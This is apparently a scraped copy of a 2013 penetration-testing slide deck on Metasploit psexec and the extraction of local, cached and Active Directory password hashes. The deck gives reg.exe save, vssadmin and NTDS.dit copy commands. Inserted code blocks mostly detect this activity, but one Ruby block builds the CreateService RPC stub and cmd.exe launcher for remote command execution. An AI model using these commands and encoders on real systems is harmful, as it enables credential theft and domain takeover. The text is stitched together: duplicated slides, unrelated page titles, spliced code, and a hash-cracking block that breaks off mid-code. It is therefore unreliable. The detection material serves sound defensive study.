Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
So, You Want To Be A “Security Expert”
Fun Tools For Penetration Testing
Who Is Royce Davis?

• Husband & Father
• Accuvant LABS: Senior Consultant
  • (a.k.a. Pen Tester)
• Cofounder: http://www.pentestgeek.com
• Author: jigsaw.rb
• Twitter: @R3dy__
What Are You Talking About?

• Penetration Testing == Offensive Security
• Uploading Shells Is No Good
• Techniques to avoid shell upload
  • Metasploit Modules
  • Command execution
  • Local & Cached hash dumping
  • Fun With Domain Controllers
What Is A Pen Test?

• Wikipedia Definition: “a method of evaluating computer and network security by simulating an attack on a computer system or network from external and internal threats.”

Not that kind of pen…
The All Powerful Shell
• What is a shell exactly?
Uploading Shells Is No Good

• We've been uploading shells to take control of remote hosts since the beginning of time, so what's the big deal?
• Shells contain binary signatures that can be recognized and blocked
  • Obfuscation only creates a different signature
• Shells can die, leaving us with no way back in
• They can also leave remnants of themselves
What Can We Do With A Shell?

Why bother with a shell in the first place?
• Command execution
  • Search the file system
  • Create users
  • Enumerate network resources
  • Upload/download files
  • Etc…
• Grab local/cached password hashes
• Dump all AD hashes from the DC
  • “password” = 8846f7eaee8fb117ad06bdd830b7586c
• How can we do stuff without a shell???
The Answer Is DCE/RPC
Distributed Computing Environment / Remote Procedure Calls
Book: DCE/RPC Over SMB – SAMBA and Windows NT* Domain Internals
Author: Luke Kenneth Casson Leighton
• Remotely interact with Windows API
• Supported by all versions of Windows
• Often left unsecured
Using Native Windows Functions

Enter 'psexec.rb'
• exploit/windows/smb/psexec.rb
• Creates & uploads a binary payload to the target over SMB
• Sends an RPC to the Service Control Manager (SCM)
  • UUID: '367abb81-9844-35f1-ad32-98f038001003'
• Creates a service, starts it, cleans up after…
• MSDN Documentation: http://msdn.microsoft.com/en-us/library/windows/desktop/ms685942%28v=vs.85%29.aspx
Inside psexec.rb

DCERPC Requests:
The dcerpc.call instance method takes two parameters. The first parameter is the opcode reference to the particular Windows function you wish to call. The second parameter is the function arguments in NDR (Network Data Representation) format.
• dcerpc.call(0x0f, stubdata) – OpenSCManager
• dcerpc.call(0x0c, stubdata) – CreateService
• dcerpc.call(0x0, svc_handle) – CloseServiceHandle
• dcerpc.call(0x10, stubdata) – OpenService
• dcerpc.call(0x13, stubdata) – StartService
• dcerpc.call(0x02, stubdata) – DeleteService
• dcerpc.call(0x0, svc_handle) – CloseServiceHandle
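The opcode table above is also what a network sensor sees: every one of these calls travels as a DCE/RPC request PDU whose opnum sits at a fixed offset in the header. The following is an added example, not code from the slides or from Metasploit, that decodes the fixed part of a request PDU (the connection-oriented layout from DCE 1.1 RPC / MS-RPCE) and names the Service Control Manager operation from the slide's opnum table. The session bytes are constructed by hand with placeholder NDR stubs, and the parser assumes an unauthenticated PDU (auth_length 0); it does not dissect the stub. It then checks whether a session carries the OpenSCManager, CreateService, StartService, DeleteService chain psexec.rb issues, which is the signature a defender would alert on for remote service creation over SMB.

```python
"""Added example: decode DCE/RPC request PDUs and name the SVCCTL operation.

Not Metasploit code. PDU layout is the connection-oriented request header
(C706 / MS-RPCE); the opnum table is the one from the slide. The sample
session below is constructed, with placeholder stub data."""
import struct

SVCCTL_UUID = "367abb81-9844-35f1-ad32-98f038001003"  # interface quoted on the slides

# opnum -> Service Control Manager function, as the slide lists them
SVCCTL_OPNUMS = {
    0x00: "CloseServiceHandle",
    0x02: "DeleteService",
    0x0c: "CreateService",
    0x0f: "OpenSCManager",
    0x10: "OpenService",
    0x13: "StartService",
}

PTYPE_REQUEST = 0x00
HEADER_LEN = 24  # 16-byte common header + alloc_hint(4) + p_cont_id(2) + opnum(2)

# The order of SCM calls psexec.rb makes; used here as a detection signature
PSEXEC_CHAIN = ("OpenSCManager", "CreateService", "StartService", "DeleteService")


def parse_request(pdu):
    """Return the header fields of a DCE/RPC v5 request PDU; the stub is kept
    as raw NDR bytes. Field order: rpc_vers, rpc_vers_minor, ptype, pfc_flags,
    drep[4], frag_length, auth_length, call_id, alloc_hint, p_cont_id, opnum."""
    if len(pdu) < HEADER_LEN:
        raise ValueError("PDU shorter than a request header")
    vers, _minor, ptype, _flags = struct.unpack_from("<BBBB", pdu, 0)
    if vers != 5 or ptype != PTYPE_REQUEST:
        raise ValueError("not a DCE/RPC v5 request PDU")
    # drep[0] high nibble: 1 = little-endian integers, 0 = big-endian
    endian = "<" if (pdu[4] & 0xF0) == 0x10 else ">"
    frag_len, _auth_len, call_id = struct.unpack_from(endian + "HHI", pdu, 8)
    _alloc_hint, ctx_id, opnum = struct.unpack_from(endian + "IHH", pdu, 16)
    return {"call_id": call_id, "ctx_id": ctx_id, "opnum": opnum,
            "frag_len": frag_len, "stub": pdu[HEADER_LEN:frag_len]}


def name_operation(opnum):
    """Map an opnum on the SVCCTL interface to its SCM function name."""
    return SVCCTL_OPNUMS.get(opnum, "opnum %#x" % opnum)


def decode_session(pdus):
    """Name every request of a session bound to SVCCTL, in wire order."""
    return [name_operation(parse_request(p)["opnum"]) for p in pdus]


def is_psexec_like(ops):
    """True if PSEXEC_CHAIN occurs as an ordered subsequence of ops."""
    it = iter(ops)
    return all(any(op == wanted for op in it) for wanted in PSEXEC_CHAIN)


def build_request(opnum, call_id, stub=b""):
    """Constructed request PDU: little-endian drep, first+last fragment, no auth."""
    frag_len = HEADER_LEN + len(stub)
    header = struct.pack("<BBBB", 5, 0, PTYPE_REQUEST, 0x03)
    header += bytes([0x10, 0x00, 0x00, 0x00])            # drep
    header += struct.pack("<HHI", frag_len, 0, call_id)  # frag_length, auth_length, call_id
    header += struct.pack("<IHH", len(stub), 0, opnum)   # alloc_hint, p_cont_id, opnum
    return header + stub


# Constructed session: the SCM calls psexec.rb makes, with placeholder stubs
SAMPLE_SESSION = [
    build_request(0x0f, 1, b"\x00" * 8),   # OpenSCManager
    build_request(0x0c, 2, b"\x00" * 32),  # CreateService (stub would carry lpBinaryPathName)
    build_request(0x13, 3, b"\x00" * 4),   # StartService
    build_request(0x02, 4, b"\x00" * 20),  # DeleteService
    build_request(0x00, 5, b"\x00" * 20),  # CloseServiceHandle
]

if __name__ == "__main__":
    ops = decode_session(SAMPLE_SESSION)
    print(" -> ".join(ops))
    print("psexec-style service chain:", is_psexec_like(ops))
```

The chain check is deliberately order-sensitive: a monitoring tool that opens the SCM and calls OpenService/StartService never issues CreateService, so it does not match. Over SMB this traffic arrives on the `\PIPE\svcctl` named pipe, which is where the decoder would be attached.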
Psexec.rb Cont.

• This is what it looks like inside Metasploit's psexec exploit module written by HDM
• exploit/windows/smb/psexec.rb (line 254)
CreateService Windows Func.

• This is the format accepted by the CreateService function
• http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450%28v=vs.85%29.aspx
lpBinaryPathName MSDN Definition

• lpBinaryPathName [in, optional]
  • The fully qualified path to the service binary file. If the path contains a space, it must be quoted so that it is correctly interpreted. For example, "d:\my share\myservice.exe" should be specified as "\"d:\my share\myservice.exe\"".
  • The path can also include arguments for an auto-start service. For example, "d:\myshare\myservice.exe arg1 arg2". These arguments are passed to the service entry point (typically the main function).
  • If you specify a path on another computer, the share must be accessible by the computer account of the local computer because this is the security context used in the remote call. However, this requirement allows any potential vulnerabilities in the remote computer to affect the local computer. Therefore, it is best to use a local file.
• psexec.rb looks like this:
  • C:\HjeKOplsYutVmBWn.exe (probably a Meterpreter payload)
• What if we tried this instead:
  • C:\windows\system32\cmd.exe /C echo dir C: ^> outputfile.txt > launchfile.bat & C:\windows\system32\cmd.exe /C launchfile.bat
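Both binary paths on this slide end up in the same place on the target: a service-installation record (System log event 7045, "A service was installed in the system") whose ImagePath is either a random-named executable at the drive root or cmd.exe /C with output redirected to a file. The following added example, which is not code from the slides or from Metasploit, triages such records for exactly those two patterns. The event lines are constructed in a simple tab-separated form rather than real exported log records, and the "random-looking name" heuristic (mixed-case letters, twelve or more, with no ordinary capitalisation) is an assumption about Metasploit's generated names, not something the slides state.

```python
"""Added example: triage Windows service-installation events (System log
event 7045) for the two binary-path patterns shown on the slides.

Not from the slides or Metasploit. The event lines are constructed in a
tab-separated 'id<TAB>Key=Value...' form, not real exported event records."""
import re

# cmd.exe registered as the service binary, as in the slide's alternative path
CMD_AS_SERVICE = re.compile(r"cmd\.exe\s+/c\b", re.IGNORECASE)
# output redirection or command chaining inside the service path
REDIRECTION = re.compile(r"\^?>|\s&\s")
# a bare <letters>.exe directly under the drive root, e.g. C:\HjeKOplsYutVmBWn.exe
ROOT_EXE = re.compile(r"^[A-Za-z]:\\([A-Za-z]{8,20})\.exe$")


def parse_7045(line):
    """Parse one constructed line; return its fields, or None for other event ids."""
    parts = line.rstrip("\n").split("\t")
    if parts[0] != "7045":
        return None
    return dict(part.split("=", 1) for part in parts[1:])


def looks_random(name):
    """Heuristic (assumption, not from the slides): at least 12 letters, mixed
    case, and not a normally capitalised word like 'Spooler'."""
    has_upper = any(c.isupper() for c in name)
    has_lower = any(c.islower() for c in name)
    return (len(name) >= 12 and name.isalpha() and has_upper and has_lower
            and name != name.capitalize())


def assess_service(fields):
    """Return the reasons an installed service looks like remote command
    execution through the Service Control Manager (empty list if none)."""
    reasons = []
    path = fields.get("ImagePath", "").strip().strip('"')
    root_exe = ROOT_EXE.match(path)
    if root_exe and looks_random(root_exe.group(1)):
        reasons.append("random-named executable at the drive root (uploaded payload)")
    if CMD_AS_SERVICE.search(path):
        reasons.append("cmd.exe /C registered as the service binary (no payload uploaded)")
        if REDIRECTION.search(path):
            reasons.append("command output redirected to a file for later retrieval")
    if looks_random(fields.get("ServiceName", "")):
        reasons.append("random-looking service name")
    return reasons


def triage(lines):
    """Map ServiceName -> reasons for every 7045 event that raised any."""
    findings = {}
    for line in lines:
        fields = parse_7045(line)
        if fields is None:
            continue
        reasons = assess_service(fields)
        if reasons:
            findings[fields["ServiceName"]] = reasons
    return findings


# Constructed events: one benign install, the two paths from the slide, one non-7045 line
SAMPLE_EVENTS = [
    "7045\tServiceName=Spooler\tImagePath=C:\\Windows\\System32\\spoolsv.exe"
    "\tStartType=auto start",
    "7045\tServiceName=HjeKOplsYutVmBWn\tImagePath=C:\\HjeKOplsYutVmBWn.exe"
    "\tStartType=demand start",
    "7045\tServiceName=yRtXpQmLbNwKdZhG\tImagePath=C:\\windows\\system32\\cmd.exe /C "
    "echo dir C: ^> outputfile.txt > launchfile.bat & "
    "C:\\windows\\system32\\cmd.exe /C launchfile.bat\tStartType=demand start",
    "7036\tServiceName=Spooler\tState=running",
]

if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EVENTS).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Event 7045 is written regardless of how the service was created, so it catches the RPC path the slides describe as well as a local `sc create`; on domain controllers and other high-value hosts the same check can be run against Security event 4697 where service-install auditing is enabled.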
The Psexec Mixin

In order to make this functionality available to other modules we created a mixin, which has been graciously accepted into the MSF.
lib/msf/core/exploit/smb/psexec.rb
• Slightly modified version of the original psexec.rb code wrapped in a function which accepts a Windows command in the following format:
  • [PATH TO cmd.exe] [/C] [INSERT WINDOWS COMMAND]
• The method is called like so: 'return psexec(command)'
• Returns 'true' if execution was successful
• Major difference is it does not try to delete cmd.exe after execution
• Also contains a 'smb_read_file(smbshare, host, file)' method for convenient retrieval of command output
Command Execution
Dumping Password Hashes

• Current methods for dumping password hashes
  • Post modules that require a meterpreter shell
  • Upload a standalone binary like pwdump/fgdump…
• These methods extract specific registry key values from the SYSTEM, SECURITY, and/or SAM registry hive (this process can flag antivirus)
• We need to somehow retrieve a copy of the registry hives and extract the hashes from them offline
Offline Password Hash Dumping

1. Authenticate to the system using a password/hash
2. Use the psexec mixin to execute the following Windows commands:
   • reg.exe save HKLM\SAM c:\windows\temp\sam
   • reg.exe save HKLM\SYSTEM c:\windows\temp\sys
   • reg.exe save HKLM\SECURITY c:\windows\temp\sec
3. Download the registry hive copies to our attacking machine
4. Remove the registry hive copies from the target
5. Open the registry hive copies on our attacking machine and extract the password hashes
Local & Cached Hash Extraction
• Local Hashes
• Domain Cached Hashes
Dumping All the Hashes

• The holy grail of most network pentests can be found inside an ESE (Extensible Storage Engine) database called NTDS.dit located on the Domain Controller
  • Protected by the operating system
  • Requires injecting into lsass and/or other black magic
• Contains a BOAT LOAD of information about the system
  • Including password hashes and usernames for all AD accounts!
Enter psexec_ntdsgrab.rb

We can use the psexec_ntdsgrab module to create or target an existing VSC (Volume Shadow Copy) and safely pull down a copy of NTDS.dit to our attacking machine.
auxiliary/admin/smb/psexec_ntdsgrab.rb
1. Use the psexec mixin to execute Windows commands for creating a VSC
   • vssadmin create shadow /For=%SYSTEMDRIVE%
2. Query vssadmin for the path to the newly created VSC
   • vssadmin list shadows
3. Copy NTDS.dit from the VSC to the WINDOWS\Temp directory
   • copy /Y \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\WINDOWS\NTDS\NTDS.dit C:\WINDOWS\Temp\ntds
4. Use reg.exe to make a copy of the SYSTEM registry hive
5. Download the 'ntds' and 'sys' files to the attacking machine
6. Clean up after ourselves
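The two procedures above (the reg.exe hive exports on the "Offline Password Hash Dumping" slide and the vssadmin / copy / reg.exe sequence psexec_ntdsgrab runs on a domain controller) leave the same footprint: a handful of process-creation records, each started by a cmd.exe whose parent is services.exe, because the psexec mixin runs commands as a service. The following added example, not code from the slides or from Metasploit, tags process-creation records (Security event 4688 with command-line auditing enabled, or Sysmon event 1) for those commands and correlates them per host, so that a lone `vssadmin create shadow` from a backup agent is not a finding but the combinations on these slides are. The records are constructed and carry only the fields the rules need.

```python
"""Added example: flag the hash-dumping command chains from the slides in
process-creation telemetry. Not from the slides or Metasploit; the records
below are constructed and carry only the fields the rules use."""
import re
from collections import defaultdict

# reg.exe save of the hives used for local (SAM+SYSTEM) and cached (SECURITY+SYSTEM) hashes
HIVE_SAVE = re.compile(r'\breg(?:\.exe)?\s+save\s+"?HKLM\\(SAM|SYSTEM|SECURITY)\b', re.I)
VSS_CREATE = re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)
VSS_LIST = re.compile(r"\bvssadmin(?:\.exe)?\s+list\s+shadows\b", re.I)
# NTDS.dit read from a shadow-copy device path instead of its live location
NTDS_FROM_VSC = re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I)


def tag_event(ev):
    """Return the set of indicator tags one process-creation record raises."""
    cmd = ev["CommandLine"]
    tags = set()
    hive = HIVE_SAVE.search(cmd)
    if hive:
        tags.add("hive_save_" + hive.group(1).upper())
    if VSS_CREATE.search(cmd):
        tags.add("vss_create")
    if VSS_LIST.search(cmd):
        tags.add("vss_list")
    if NTDS_FROM_VSC.search(cmd):
        tags.add("ntds_copy_from_vsc")
    # cmd.exe whose parent is services.exe was started as a service: the
    # mixin's "[cmd.exe] /C [command]" pattern looks exactly like this.
    if (ev["ParentImage"].lower().endswith(r"\services.exe")
            and ev["Image"].lower().endswith(r"\cmd.exe")):
        tags.add("cmd_spawned_by_scm")
    return tags


def correlate(events):
    """Union the tags per host and return the verdicts each host earns.
    Single indicators are not verdicts; the slide's combinations are."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["Host"]] |= tag_event(ev)
    verdicts = {}
    for host, tags in per_host.items():
        found = []
        if {"hive_save_SAM", "hive_save_SYSTEM"} <= tags:
            found.append("local hash dump: SAM and SYSTEM hives exported")
        if {"hive_save_SECURITY", "hive_save_SYSTEM"} <= tags:
            found.append("cached domain credentials: SECURITY and SYSTEM hives exported")
        if {"ntds_copy_from_vsc", "hive_save_SYSTEM"} <= tags:
            found.append("AD hash dump: NTDS.dit copied from a shadow copy with the SYSTEM hive")
        if "cmd_spawned_by_scm" in tags:
            found.append("commands executed as a service (psexec-style remote execution)")
        if found:
            verdicts[host] = found
    return verdicts


# Constructed records: a workstation hive export, a DC NTDS grab, and a benign backup job
SAMPLE_EVENTS = [
    {"Host": "WS01", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /C reg.exe save HKLM\SAM c:\windows\temp\sam"},
    {"Host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save HKLM\SYSTEM c:\windows\temp\sys"},
    {"Host": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save HKLM\SECURITY c:\windows\temp\sec"},
    {"Host": "DC01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin create shadow /For=C:"},
    {"Host": "DC01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin list shadows"},
    {"Host": "DC01", "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /C copy /Y \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"
                    r"\WINDOWS\NTDS\NTDS.dit C:\WINDOWS\Temp\ntds"},
    {"Host": "DC01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save HKLM\SYSTEM C:\WINDOWS\Temp\sys"},
    {"Host": "FS02", "ParentImage": r"C:\Program Files\Backup\agent.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": r"vssadmin create shadow /For=D:"},
]

if __name__ == "__main__":
    for host, found in correlate(SAMPLE_EVENTS).items():
        print(host, "->", "; ".join(found))
```

None of this fires unless command lines are being recorded: 4688 carries the command line only when "Include command line in process creation events" is enabled, which is the first thing to check before relying on rules like these.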
Getting What We Want From NTDS.dit

• We'll need to use the 'libesedb' C library to extract the right tables from NTDS.dit
  • $ wget https://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz
  • $ tar xvzf libesedb-alpha-20120102.tar.gz
  • $ cd libesedb-20120102/
  • $ ./configure
  • $ make && make install
• Once libesedb is compiled we will use esedbexport, located in 'libesedb-20120102/esedbtools', to export the datatable which contains the user account password hashes for AD
• http://www.pentestgeek.com/2012/11/16/dumping-domain-password-hashes-using-metasploit-ntds_hashextract-rb/
Closing

• Uploading a binary shell to the target can be harmful to a penetration test
• DCERPC allows us to do a lot of the functions we would ask of a binary shell without uploading one to the target
• Metasploit modules already exist to achieve remote command execution, grab local/cached password hashes and dump AD hashes from a DC
• The sky is the limit as to what else we could do if we all chose to adapt this style of thinking
Any Questions?

10/9/2013

So, You Want To Be A “Security Expert”
Thank You!
Royce Davis
Accuvant LABS
Senior Consultant – Attack & Pen Team
royce.e.davis@gmail.com
http://www.pentestgeek.com
@R3dy__

Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

So you want to be a security expert

  • 1. So, You Want To Be A "Security Expert": Fun Tools For Penetration Testing
    Proprietary and Confidential. Do Not Distribute. © 2013 Accuvant, Inc. All Rights Reserved.
  • 2. Who Is Royce Davis?
    • Husband & Father
    • Accuvant LABS: Senior Consultant (a.k.a. Pen Tester)
    • Cofounder: http://www.pentestgeek.com
    • Author: jigsaw.rb
    • Twitter: @R3dy__
  • 3. What Are You Talking About?
    • Penetration Testing == Offensive Security
    • Uploading Shells Is No Good
    • Techniques to avoid shell upload
    • Metasploit Modules
      • Command execution
      • Local & Cached hash dumping
      • Fun With Domain Controllers
  • 4. What Is A Pen Test? (Not that kind of pen…)
    • Wikipedia definition: "a method of evaluating computer and network security by simulating an attack on a computer system or network from external and internal threats."
  • 5. The All Powerful Shell
    • What is a shell exactly?
  • 6. Uploading Shells Is No Good
    • We've been uploading shells to take control of remote hosts since the beginning of time, so what's the big deal?
    • Shells contain binary signatures that can be recognized and blocked
      • Obfuscation only creates a different signature
    • Shells can die, leaving us with no way back in
    • They can also leave remnants of themselves
  • 7. What Can We Do With A Shell?
    Why bother with a shell in the first place?
    • Command execution
      • Search the file system
      • Create users
      • Enumerate network resources
      • Upload/download files
      • Etc…
    • Grab local/cached password hashes
    • Dump all AD hashes from the DC
      • "password" = 8846f7eaee8fb117ad06bdd830b7586c (the NT hash: MD4 over the UTF-16LE password, unsalted)
    • How can we do stuff without a shell???
  • 8. The Answer Is DCE/RPC
    Distributed Computing Environment / Remote Procedure Calls
    Book: DCE/RPC over SMB: SAMBA and Windows NT Domain Internals, by Luke Kenneth Casson Leighton
    • Remotely interact with the Windows API
    • Supported by all versions of Windows
    • Often left unsecured
  • 9. Enter 'psexec.rb': Using Native Windows Functions
    • exploit/windows/smb/psexec.rb
    • Creates & uploads a binary payload to the target over SMB
    • Sends an RPC request to the Service Control Manager (SCM)
      • Interface UUID: 367abb81-9844-35f1-ad32-98f038001003 (svcctl)
    • Creates a service, starts it, cleans up after…
    • MSDN documentation: http://msdn.microsoft.com/en-us/library/windows/desktop/ms685942%28v=vs.85%29.aspx
  • 10. Inside psexec.rb
    DCERPC requests: the dcerpc.call instance method takes two parameters. The first is the opnum of the particular SCM function you wish to call; the second is the function arguments (the stub data) in NDR (Network Data Representation) format.
    • dcerpc.call(0x0f, stubdata): OpenSCManager
    • dcerpc.call(0x0c, stubdata): CreateService
    • dcerpc.call(0x00, svc_handle): CloseServiceHandle
    • dcerpc.call(0x10, stubdata): OpenService
    • dcerpc.call(0x13, stubdata): StartService
    • dcerpc.call(0x02, stubdata): DeleteService
    • dcerpc.call(0x00, svc_handle): CloseServiceHandle
  • 11. psexec.rb cont.
    • This is what it looks like inside Metasploit's psexec exploit module, written by HDM: exploit/windows/smb/psexec.rb (line 254)
  • 12. CreateService Windows Func.
    • This is the format accepted by the CreateService function
    • http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450%28v=vs.85%29.aspx
  • 13. lpBinaryPathName MSDN Definition
    • lpBinaryPathName [in, optional]
      • The fully qualified path to the service binary file. If the path contains a space, it must be quoted so that it is correctly interpreted. For example, "d:\my share\myservice.exe" should be specified as "\"d:\my share\myservice.exe\"".
      • The path can also include arguments for an auto-start service. For example, "d:\myshare\myservice.exe arg1 arg2". These arguments are passed to the service entry point (typically the main function).
      • If you specify a path on another computer, the share must be accessible by the computer account of the local computer because this is the security context used in the remote call. However, this requirement allows any potential vulnerabilities in the remote computer to affect the local computer. Therefore, it is best to use a local file.
    • psexec.rb looks like this:
      • C:\HjeKOplsYutVmBWn.exe (probably a Meterpreter payload)
    • What if we tried this instead:
      • C:\windows\system32\cmd.exe /C echo dir C: ^> outputfile.txt > launchfile.bat & C:\windows\system32\cmd.exe /C launchfile.bat
      • (the ^ escapes the inner > so that it is written into launchfile.bat instead of redirecting the echo itself; nothing is uploaded, the service binary is the target's own cmd.exe)
  • 14. The Psexec Mixin
    To make this functionality available to other modules we created a mixin, which has been graciously accepted into the MSF: lib/msf/core/exploit/smb/psexec.rb
    • A slightly modified version of the original psexec.rb code, wrapped in a function which accepts a Windows command in the following format: [PATH TO cmd.exe] [/C] [INSERT WINDOWS COMMAND]
    • The method is called like so: return psexec(command)
    • Returns true if execution was successful
    • Major difference: it does not try to delete cmd.exe after execution (there is no uploaded binary to clean up)
    • Also contains a smb_read_file(smbshare, host, file) method for convenient retrieval of command output
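Slides 10 to 14 describe two things without showing them: the NDR-encoded stub data that dcerpc.call(0x0c, stubdata) carries for CreateService, and the cmd.exe launcher string that goes into lpBinaryPathName. The stand-alone Ruby below is an added example, not code from the slides or from Metasploit: its NDR helpers are modeled on the shape of the framework's NDR encoder, the RCreateServiceW field order follows [MS-SCMR] as I read it (verify against the module source before relying on it), the SERVICE_* constants are the standard Win32 values, and the 20-byte SCM handle is a constructed stand-in for the one ROpenSCManagerW would return.

```ruby
# Added example (not from the slides or Metasploit): NDR encoding of an
# RCreateServiceW request plus the cmd.exe launcher used as lpBinaryPathName.
module NDR
  # 4-byte little-endian unsigned long
  def self.long(n)
    [n & 0xffffffff].pack('V')
  end

  # NDR pads variable-length data out to a 4-byte boundary
  def self.align(bytes)
    "\x00".b * ((4 - (bytes.bytesize & 3)) & 3)
  end

  # Conformant varying UTF-16LE string: max count, offset, actual count, chars.
  # Counts are in characters and include the terminating NUL.
  def self.wstring(str)
    data = (str + "\x00").encode('UTF-16LE').b
    count = str.length + 1
    long(count) + long(0) + long(count) + data + align(data)
  end

  # A [unique] string pointer: non-zero referent id, then the string
  def self.uwstring(str, referent = rand(1..0xffffffff))
    long(referent) + wstring(str)
  end

  # Decode a conformant varying string at off; returns [string, next_offset]
  def self.read_wstring(buf, off)
    _max, _start, actual = buf[off, 12].unpack('V3')
    data = buf[off + 12, actual * 2]
    str = data.force_encoding('UTF-16LE').encode('UTF-8').chomp("\x00")
    [str, off + 12 + actual * 2 + ((4 - ((actual * 2) & 3)) & 3)]
  end
end

SERVICE_ALL_ACCESS          = 0x000F01FF
SERVICE_WIN32_OWN_PROCESS   = 0x00000010
SERVICE_INTERACTIVE_PROCESS = 0x00000100
SERVICE_DEMAND_START        = 0x00000003
SERVICE_ERROR_IGNORE        = 0x00000000

# Stub data for RCreateServiceW (opnum 0x0c). scm_handle is the 20-byte
# context handle returned by ROpenSCManagerW (opnum 0x0f).
def create_service_stub(scm_handle, service_name, display_name, binary_path)
  raise ArgumentError, 'SCM context handle must be 20 bytes' unless scm_handle.bytesize == 20
  scm_handle.b +
    NDR.wstring(service_name) +                                         # lpServiceName
    NDR.uwstring(display_name) +                                        # lpDisplayName [unique]
    NDR.long(SERVICE_ALL_ACCESS) +                                      # dwDesiredAccess
    NDR.long(SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS) + # dwServiceType
    NDR.long(SERVICE_DEMAND_START) +                                    # dwStartType
    NDR.long(SERVICE_ERROR_IGNORE) +                                    # dwErrorControl
    NDR.wstring(binary_path) +                                          # lpBinaryPathName
    NDR.long(0) * 7 # lpLoadOrderGroup, lpdwTagId, lpDependencies, dwDependSize,
                    # lpServiceStartName, lpPassword, dwPwSize: all NULL / 0
end

# cmd.exe treats & | < > ^ specially; prefix them with ^ so they survive the
# echo and land in the batch file verbatim (%VAR% and ! are not handled here)
def escape_cmd_meta(command)
  command.gsub(/[&|<>^]/) { |m| "^#{m}" }
end

# The lpBinaryPathName from slide 13, generalised to any command: cmd.exe echoes
# the command (with its output redirected) into a batch file, then runs it
def command_service_path(command, output_file, launch_file)
  cmd = 'C:\Windows\System32\cmd.exe'
  "#{cmd} /C echo #{escape_cmd_meta(command)} ^> #{output_file} > #{launch_file} & #{cmd} /C #{launch_file}"
end

if __FILE__ == $PROGRAM_NAME
  handle = ("\x00" * 4 + "\x11" * 16).b # constructed stand-in for a real SCM handle
  path = command_service_path('dir C:\Users', 'C:\Windows\Temp\out.txt', 'C:\Windows\Temp\launch.bat')
  stub = create_service_stub(handle, 'svc1', 'svc1', path)
  puts path
  puts "stub: #{stub.bytesize} bytes, service name at offset 20 = #{NDR.read_wstring(stub, 20).first}"
end
```

Note what the encoding makes visible: the service name and binary path are plain conformant varying strings, the display name is a unique pointer (a referent id precedes it), and the seven trailing zero longs are the NULL pointers and sizes for everything psexec does not set. Feeding the result to dcerpc.call(0x0c, ...) over an authenticated svcctl bind is the only step not shown here.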
  • 15. Command Execution
  • 16. Dumping Password Hashes
    • Current methods for dumping password hashes:
      • Post modules that require a Meterpreter shell
      • Upload a standalone binary like pwdump/fgdump…
    • These methods extract specific registry key values from the SYSTEM, SECURITY, and/or SAM registry hives (this process can flag antivirus)
    • We need to somehow retrieve a copy of the registry hives and extract the hashes from them offline
  • 17. Offline Password Hash Dumping
    1. Authenticate to the system using a password/hash
    2. Use the psexec mixin to execute the following Windows commands:
      • reg.exe save HKLM\SAM c:\windows\temp\sam
      • reg.exe save HKLM\SYSTEM c:\windows\temp\sys
      • reg.exe save HKLM\SECURITY c:\windows\temp\sec
    3. Download the registry hive copies to our attacking machine
    4. Remove the registry hive copies from the target
    5. Open the registry hive copies on our attacking machine and extract the password hashes (SAM holds the local account hashes, SECURITY the domain cached credentials; the boot key from SYSTEM is needed to decrypt either)
  • 18. Local & Cached Hash Extraction
    • Local Hashes
    • Domain Cached Hashes
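The local hashes that step 5 yields are NT hashes of the form quoted on slide 7 ("password" = 8846f7eaee8fb117ad06bdd830b7586c). The following is an added example, not code from the slides: it reproduces that value with a pure-Ruby MD4 (RFC 1320, so it runs even where OpenSSL has MD4 disabled) and then checks a pwdump-style dump against a short candidate list offline. The dump lines are constructed sample data, not output from a real system.

```ruby
# Added example (not from the slides): NT hash = MD4(UTF-16LE(password)),
# with a pure-Ruby MD4 and an offline check against pwdump-format lines.
MASK32  = 0xffffffff
MD4_S   = [[3, 7, 11, 19], [3, 5, 9, 13], [3, 9, 11, 15]].freeze
MD4_K   = [(0..15).to_a,
           [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15],
           [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]].freeze
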